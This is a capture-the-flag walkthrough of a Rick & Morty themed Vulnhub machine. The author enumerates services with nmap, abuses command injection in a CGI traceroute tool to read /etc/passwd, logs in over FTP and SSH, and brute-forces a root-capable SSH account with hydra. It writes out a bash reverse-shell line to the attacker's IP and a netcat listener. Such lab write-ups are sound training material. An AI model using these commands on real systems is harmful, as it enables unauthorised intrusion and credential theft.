It’s been a while since I’ve done a full writeup so figured I was due for posting another one. Mainly I’ve been working through as many HacktheBox Windows machines as possible in preparation for the OSCP exam (I think I’m finally getting somewhat decent at Windows priv-esc).
Vulnhub just posted a bunch of new VMs, though, and I couldn’t resist doing a Ricky & Morty themed challenge. 🙂 There will be a series of flags totaling 130 worth of points…so let’s see if we can get them all!
We’ll kick things off with a nmap host discovery scan.
nmap 192.168.111.0/24 -sP
Now for an OS/service enumeration scan of the IP.
nmap 192.168.111.100 -O -sV
Looks like we have several services to work with including Cockpit Web Service which I’m not too familiar with personally. Some googling shows that it is a web-based server administration tool and we can get to the login prompt with the port listed above: http://192.168.111.100:9090/
Without too much effort there is our first flag! 10/130 points acquired.
I’m a little confused about the prompt,though. There is no available field for password and whatever I fill in for the user name I can’t hit enter to try to authenticate or do anything interactive. One thought is that it is trying to validate the user ID before prompting for a password, but it may just be that the site is broken, or that my browser is incompatible. We’ll come back to this and check out the other services instead.
Let’s take a look at the main HTTP site:
Not much here, and the HTML source is just as barren. We’ll do a quick nikto scan to see if there are any more obvious directory listings, admin pages, etc. to take a look at.
If this was a real environment that would look way too suspiciously like a honeypot.
The contents of FLAG.txt (20/130 points acquired):
And the contents of passwords.html:
<!DOCTYPE html> <html> <head> <title>Morty's Website</title> <body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body> <!--Password: winter--> </head> </html>
So we have a password of “winter”, but what is the service and ID associated with it? Let’s take that hint and dig a little deeper using dirbuster to try to further enumerate possible paths on the web-server. Using the “directory-list-2.3-small.txt” wordlist I first tried searching for directories + extensions of txt,html,php:
Taking a look at the robots.txt file we get yet another clue.
root_shell.cgi gives an “–UNDER CONSTRUCTION– ” message with the following source:
<html><head><title>Root Shell </title></head> --UNDER CONSTRUCTION-- <!--HAAHAHAHAAHHAaAAAGGAgaagAGAGAGG--> <!--I'm sorry Morty. It's a bummer.--> </html>
The tracertool.cgi seems up and running, though. We’ll give it a test.
Now let’s see if we can append additional commands.
Yup, I absolutely can. I’ll try reusing a bash reverse shell command from pentestmonkey again:
bash -i >& /dev/tcp/192.168.111.101/8080 0>&1
Before running I’ll also open a netcat listener on my Kali machine:
nc -nlp 8080
No go. I try some different spacing and formatting, different ports (80,443,etc.), but no success. Added commands to the end to make sure there was no breaks in execution. Tried the Perl/Python shells with same results. I’m guessing there are very strict limits on commands available to apache, and/or firewall rules restricting traffic.
So what else can we do to try and exploit this available command injection?
Ha ha, someone replaced the CAT command to print an ASCII art cat to the screen instead. What can we use in place of cat?
Well, “head” & “tail” work to grab the first/last 100 bytes:
Without any overlap we can’t be assured we’re not missing some accounts, though. Let’s try “more” instead:
systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin
systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:996:User for polkitd:/:/sbin/nologin
cockpit-ws:x:996:994:User for cockpit-ws:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
There we go. After stripping out the login IDs without interactive shells let’s try logging into SSH using the password of “winter” we found above.
That doesn’t work, or at least we might have to do something to activate it first. Let’s try the credentials authenticating to FTP instead.
And there is another flag! (30/130 points)
Convinced I was possibly missing something I re-ran a full port scan of the IP again.
nmap 192.168.111.100 -O -sV -p- -T4
My intuition was correct and we got yet another flag right in the service fingerprint for port 13337. (40/130 points)
Let’s try Summer/winter for this new SSH now instead.
That worked! There’s a flag but it’s the same as the one found through FTP (which pointed directly to Summer’s home directory as well).
Listing out the contents of the available home directories we get many possible leads here. I pulled down all the files listed here and then tried to unzip the journal.txt.zip, but it requires a password.
On the face of it Safe_Password.jpg only shows the following:
But with a simple cat of the file we can find the password contained within:
Using the password “Meeseek” the zip extracts successfully and we’re given another flag and a new hint. (60/130 points)
Binwalk identifies the “safe” file as an ELF executable. Let’s try running it.
A quick “apt-get install mcrypt” and we’re able to run the executable with the required libraries.
Using the “131333” from the flag above passed as an argument we’ve got our next flag! (80/130 points)
Checking out the Rick & Morty fan wiki I find that his old band name is “The Flesh Curtains”.
So that gives us 26 upper case letters, then 10 possible digits, and then 6 band name word possibilities (initially doing first letter capitalized and all lower-case, but may need to try additional combinations like all-upper case if that doesn’t work).
With some quick and dirty Python and embedded loops I created a possible password list of 1560 combinations. Now let’s plug the password list into Hydra and try to authenticate to SSH with RickSanchez ID we know from dumping /etc/passwd + the home directory listing above.
hydra -l RickSanchez -P rickmortypass.txt ssh://192.168.111.100 -s 22222
Not long at all and we get a successful hit! Let’s go ahead and log in as Rick.
We have root! Looking into /root/ we find another flag. (110/130 points)
We’re still missing 20 points, though. We never took a look at what was on port 60000 so let’s do that now…
Doing a simple telnet connect to banner grab a shell opens immediately. (120/130 points)
After racking my brain for a while trying to figure out what else I might have missed I ended up searching for additional “flag.txt” files as root and found the last one under /var/ftp (public directory). (130/130 points)
Testing now I see you’re able to log into the FTP server with anonymous creds:
Well that’s it! Got all flags as well as root!